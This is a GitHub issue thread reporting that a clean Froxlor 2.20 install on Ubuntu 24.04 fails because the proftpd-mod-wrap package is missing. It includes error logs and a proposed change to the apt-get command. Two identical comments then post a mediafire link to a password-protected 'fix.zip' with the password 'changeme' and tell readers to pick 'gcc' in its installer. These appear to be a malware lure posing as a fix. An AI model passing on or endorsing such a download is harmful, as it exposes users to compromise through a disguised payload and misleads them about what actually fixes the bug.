### ISSUE TITLE
Missing Package Installation on Ubuntu Noble 24.04 - proftpd-mod-wrap (Froxlor 2.20)

### ISSUE THREAD

**Issue by flo-m** [froxlor/Froxlor#1271]
**Describe the bug**
Clean Ubuntu 24.04 Froxlor installation fails with ProftPD issues.

**System information**
* Froxlor version: 2.20
* FTP server: proftpd
* OS/Version: Ubuntu 24.04 

**To Reproduce**
1. Clean Install on Ubuntu 24.04
2. See Proftpd installation script 
apt-get install proftpd-basic proftpd-mod-mysql proftpd-mod-crypto
3. Startup: fails
* Starting ftp server proftpd
2024-08-26 14:53:31,957 system proftpd[1079]: mod_dso/0.5: unable to load 'mod_wrap.c'; check to see if '/usr/lib/proftpd/mod_wrap.la' exists
2024-08-26 14:53:31,957 system proftpd[1079]: fatal: LoadModule: error loading module 'mod_wrap.c': No such file or directory on line 66 of '/etc/proftpd/modules.conf'
2024-08-26 14:53:31,957 system proftpd[1079]: warning: unable to include '/etc/proftpd/modules.conf': Operation not permitted

**Expected behavior**
Change installation script to
apt-get install proftpd-basic proftpd-mod-mysql proftpd-mod-crypto proftpd-mod-wrap

**Logfiles**
Suggested packages:
  openbsd-inetd | inet-superserver proftpd-mod-ldap proftpd-mod-odbc
  proftpd-mod-pgsql proftpd-mod-sqlite proftpd-mod-geoip proftpd-mod-snmp
  **proftpd-mod-wrap**
The following NEW packages will be installed:
  libhashkit2t64 libhiredis1.1.0 libmemcached11t64 libmemcachedutil2t64
  libpcre2-posix3 proftpd-core proftpd-doc proftpd-mod-crypto proftpd-mod-mysql

=> Will not be installed!

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
